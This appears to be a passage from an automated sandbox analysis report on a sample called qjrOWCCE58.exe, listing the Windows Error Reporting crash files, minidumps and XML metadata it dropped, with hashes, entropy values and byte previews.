Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.1.1.8.8.7.2.3.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.a.1.3.2.3.6.-.b.d.1.1.-.4.9.5.3.-.b.1.c.7.-.2.1.2.8.8.1.c.9.e.9.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.b.1.a.3.b.c.-.2.0.9.3.-.4.c.c.7.-.9.a.6.c.-.7.c.4.c.a.1.6.f.a.5.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_12a4344f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8772900520367355
Encrypted:	false
SSDEEP:	96:+4wRDshloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72OyEmBDIi8:4oH56rwjxlk/u7sbS274It5E
MD5:	B1CF46361A43EE1319E9A672595A659C
SHA1:	DB305FB5E990C87607DC31B117F2E406F76C4673
SHA-256:	9C4773A62BFDA7D66E522233163F2D69CFC213A2E20D2B5F1D82DC02C9D312C9
SHA-512:	71941E6ED1E5C5AD2BE6A887E79F0BE73259813C3F7949F1DF57EB3E519582B0989D7DC26613576D2C68B971F7AF6C2BB2775C4A5DA0D370BD2D8D7B69DBE09B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.2.9.4.1.8.9.7.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.d.6.7.f.b.7.-.2.d.2.3.-.4.f.a.5.-.9.6.b.c.-.9.4.c.7.2.f.d.2.5.f.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.0.5.a.a.4.a.-.4.9.9.a.-.4.9.6.2.-.a.f.5.f.-.a.6.1.0.e.c.6.a.1.f.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_181043fe\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8774641034858449
Encrypted:	false
SSDEEP:	96:L9DCwRnshloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72OyEmBDG:Z7sH56rwjxlk/u7sbS274It5E
MD5:	76B53D6054B18CA6052DD3B136605B63
SHA1:	50E9777517AF88BA0F6CD0242CB97CC615BF37CD
SHA-256:	9DA5119CD79312E876922C812BCD73D739A71F4FAC43525D30DE77BF67088F5B
SHA-512:	65650A0FDFAF8D1F973D40173E46A348188FF04ED2C2F4DCBCA0A63A6D3053D7E7D0BAA9DB249005FE74D9B84A1FA57F8CAE5B9CAF7BA5782535A6034294A479
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.3.4.0.2.4.7.9.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.2.a.a.d.6.2.-.3.a.9.8.-.4.3.1.f.-.b.f.d.6.-.2.4.9.d.9.0.8.c.5.d.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.6.0.a.1.7.3.-.5.c.f.a.-.4.b.f.2.-.b.8.b.f.-.1.4.9.7.b.b.5.f.c.a.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_19545302\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8776413401735936
Encrypted:	false
SSDEEP:	96:egMUrOegwRbshloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72Oy2:QIZpgH56rwjxlk/u7sbS274It5E
MD5:	070C32C8479C605B623585A13C8B68EB
SHA1:	2B1F34717D17B838EB638F65BB19CA7F4F1A0E8D
SHA-256:	5C7C7CA72B14717D2AD99C49BC29ACC0DD383A782DC08A6F5643EFF780AD601F
SHA-512:	1A0A5F10D4945C5FC95089AFF292AD18E7B5E6DE3082E73835C6BA7945006E03542AD3476E632568A29066FC0A34F0DDFA451532EC137591EAAA74984306FCFB
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.3.7.4.6.9.4.2.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.2.a.e.9.5.7.-.4.c.5.a.-.4.b.f.0.-.8.3.c.c.-.4.0.c.3.2.4.1.9.7.2.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.e.3.5.2.a.b.-.5.5.c.c.-.4.b.6.b.-.9.e.3.f.-.5.9.9.2.5.7.3.9.3.e.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DD9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:26 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	82940
Entropy (8bit):	2.419360403248699
Encrypted:	false
SSDEEP:	384:s6mU6ecPUYTpHgqPpi/bqERBqlpdBSThAIWDnHjzv4/CjkpyPWeWEj7JY5mD:b6ecF/WMqTh8HjzvCCfWqYA
MD5:	4E0FCF66325093518C5754B8F6243493
SHA1:	5D7E739936EC0E70B40DA34D2A01642A71F4CEF1
SHA-256:	AFD5DFBD711816B9342DFF86C7348BF59C63B68E859619FD47B1E4E87FD7EFD9
SHA-512:	E39E1CD548ABA5B7A0223DDF659CB6271FB56DF3368C514DBC43F757052E3085E53B403E22CC06F0D92A4480D7068096F23C9099014619D2A2DD6A9B7F06307D
Malicious:	false
Preview:	MDMP....... .........sb............T...............\.......$....6..........T.......8...........T............ ...#..........@...........,....................................................................U...........B..............GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20D7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8412
Entropy (8bit):	3.704836972955608
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiXc6IxS5W6YWb/SUzgN0gmfwS3CpBst89brAsfv5m:RrlsNis6IxUW6YySUzY0gmfwS5KrTfM
MD5:	7085203A35DC3F534F0CFF1B5DF0FCA3
SHA1:	D042062D778DB9348191AD2DCEC1F29641742F63
SHA-256:	5993C8A99127D2A29A30451E9AAAD4706E24B7FD0BE3B54083CDE98F5437F901
SHA-512:	EE2DCAC8978A2257CD2AD7325961D719B09C8D5B64F3D23F86F3D380E5AA5B51F8BF35BDF604B9EF9FEC88DF08008FBAE9E8F9490094B180FE56C6D0CDB69A84
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21C3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.48799041622298
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI9HyyWgc8sqYjk8fm8M4JyHMFv+q8vyHo/S4Jd:uITfcAyTgrsqYdJgmKgoa4Jd
MD5:	34269584E7C2B1D28C88F6732EDBB4CB
SHA1:	103DEA433C10D1980550EEB729B0126022AD63C9
SHA-256:	EE80EFE834063051A84E112675EE65874C298CA024D0706F1E1B15947246E2FE
SHA-512:	1267EE7F557D114CAC216CAC44EA30D4A12F0B53F6DF80EB36920D3210A30B912227C20933622B21247A5E84CF5BB3B906C05CF3A0DEDC04294EDAF92F401CA9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501791" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CBD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:29 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	95754
Entropy (8bit):	2.1014195071277935
Encrypted:	false
SSDEEP:	384:EdwxNWLO61K1Uev9NLbqTQKtRBqcHty8B/kP/jFvv5C470lZ/ajkpyPWeWkzvmhg:Ede61IBlcPp//kP7Fvv444ldafWvhz1m
MD5:	8652497299CC88D253E189BDA49347C7
SHA1:	50815BC9188FD0C247F2AF445B230E652D0292E4
SHA-256:	1FFA07D955164F3774F359A1AB6C0C20FC390AD1B572E70C5D99ED24A6BAA2A5
SHA-512:	DDDE030B173694723F9AA89A37FFA3BE1F8D5FE486A4C944727894E938452C5CA7944D2898458C0B3FDCC90FCA192A2B8E2C0ADE7430D814C56E8617710D5983
Malicious:	false
Preview:	MDMP....... .........sb....................................$....?..........T.......8...........T........... "...S...........................................................................................U...........B......T.......GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER30D5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8414
Entropy (8bit):	3.703610859341354
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiX+6Ieb6YWzSUOmBgmfwS3CpBD89bsAsfSkm:RrlsNiO6Ieb6YCSUOmBgmfwSZsTfg
MD5:	3A2AA5F63253BA9EBEA737429B82DAA0
SHA1:	7A85E6BA966635D49F62A5A64ECA1B7165129762
SHA-256:	ED50048D4D995BC2D3333C64C7BAF1FBBF40C8CD531A58638002EF9257138D1D
SHA-512:	01BBD7F42C3BE9C95BCD013DD21E1DFEE38E33EB200F2B77C3AE0A1D7C3D6F30CA9DF5DEBFB5631834E7BF32E8EB60D6AD6300EDC2815F7B31B418405EAABC07
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER329B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.486722835348809
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI9HyyWgc8sqYjps8fm8M4JyHMF/+q8vyHo/S4Jd:uITfcAyTgrsqYtRJgGKgoa4Jd
MD5:	8D18C1B5C512A092175BDA8130A6F991
SHA1:	C6C36B275556769E12E2545FBFB3108FA89F9BDB
SHA-256:	0A108533A20E56651B9A4421D6227A6056EB9DED3EEE65D79BB6249F1729BC16
SHA-512:	1D3F8E48E6056D162541430BE7803158BB4F007A8D0FBDA18EEDBEBAFDF9A89F02B6A9ECA67B6237A4DCECCD1A3429AFC7DA3792AFB1A7FFB64FC19F3C593717
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1501791" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:19 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	83752
Entropy (8bit):	2.4289512577684818
Encrypted:	false
SSDEEP:	384:SD6m46sxkWR7PqlpSYqbqTgRBq5pdBSThAIWDnHjzv4/CRkpyPWeWEzCj9uEO:SI6s37yB4c1qTh8HjzvCCJWbu
MD5:	016703E04EDCE822899541773C68F07B
SHA1:	2BB25B21E0A9A1CFEB1B4B695C07DAF9EC11BCE5
SHA-256:	CFAA27327896C69E2FAEC1768617FBF221BA6D40FB01B9FA0CE13DFCE7F845A6
SHA-512:	4701F583CB2517B8953ACAB1BEA1EFEE6FE2FD7C5DB1DDA115B70165FFFC9E3B9EF0969FAA32251A0F6906A6D20819DC2144323F21756A7861EB25309FCAFF30
Malicious:	false
Preview:	MDMP....... .........sb............T...............\.......$....6..........T.......8...........T............ ..H&..........@...........,....................................................................U...........B..............GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EED.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu May 5 12:40:34 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	95234
Entropy (8bit):	2.1152729640763837
Encrypted:	false
SSDEEP:	384:OLwxNW46I/ft3z44vgILbqTJNs8PIKyRBqAHsCP/jFvv5C470lZ/ajkpyPDeWk78:OLM6I93eOcg4iP7Fvv444ldafDW3C+S
MD5:	7E4F2ED8F56A715AD723B10F5090863D
SHA1:	46A87441A2DFDAF161D075598414E95EEE899791
SHA-256:	C72440E77E5B3EBB2BEF85BE9F3EEEE2FB3111E83BA24CEFED3C6048C3EA7BEC
SHA-512:	9E0BE163B7C7566AB082776956C5968A56605D537C2FF09FB9A6F28CE2F160F756652D095F70F01450CC7C05E4EF5ACC5C251C6A33F5E1A99A141FF06DD9214E
Malicious:	false
Preview:	MDMP....... .........sb....................................D....?..........T.......8...........T........... "...Q...........................................................................................U...........B......T.......GenuineIntelW...........T.......8.....sb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER41DC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8412
Entropy (8bit):	3.7025697219105487
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiX+6Ie7ub6YWzSUZNgmfwS3CpBS89bIAsfNYm:RrlsNiO6Ie7ub6YCSUZNgmfwSmITfX
MD5:	351702278BFB4F913C64D7B32254E491
SHA1:	0899A811DEA171CE7E3F5EBE7E46D49196D5EED1
SHA-256:	D9CC60346ED834A1E8AA5F76E4A35F1CED6777D1D198B084EBD052CA814779E6
SHA-512:	B562AF57DF19E7CFD43954358861A51812F96D3CAEA23434198BA42A7E21B280D0782B3504029985244B54D63839D24A5B50C0E985F3ADF02ECB69C5BBE24782
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4306.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4704
Entropy (8bit):	4.490571287892598
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI9HyyWgc8sqYjz8fm8M4JyHMF+z+q8vyHo/S4Jd:uITfcAyTgrsqY0JgxzKgoa4Jd
MD5:	B1309460E6A3530F0CD91114E1BEE2EB
SHA1:	344C5167F32E869AA43805F5F9EB44475787EEA4
SHA-256:	B6ABBCA54DF7EC1DBF6E8179D778719D6F13D4D1D34E85CBAC9BE053215E25AF
SHA-512:	11532CA3CA48244009ABC4D2A8EC502C01DA47E075BF7D4A7173DE22699B86CB321BB3A04CDBE6CD2B2D7C14CDC78A802FCE7BD509A64F180304D5AABE3355DC
Malicious:	false
